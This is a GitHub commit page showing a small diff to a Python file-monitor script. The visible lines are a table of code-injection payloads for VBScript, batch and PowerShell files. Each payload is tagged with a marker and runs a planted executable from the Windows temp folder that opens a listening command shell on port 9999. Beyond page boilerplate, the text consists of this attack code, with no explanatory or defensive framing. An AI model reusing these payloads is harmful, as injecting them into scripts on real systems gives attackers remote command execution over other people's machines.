We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 299b96e + bc364b5 commit 1689cf0Copy full SHA for 1689cf0
File_Monitor/File_Monitor.py
@@ -16,4 +16,4 @@
16
'.vbs': ["\r\n'bhpmarker\r\n", f"\r\nCreateObject(\"Wscript.Shell\").Run(\"C:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\")\r\n"],
17
'.bat': ["\r\nREM bhpmarker\r\n", "\r\nC:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\r\n"],
18
'.ps1': ["\r\n#bhpmarker", "Start-Process \"C:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\""],
19
-}
+}
0 commit comments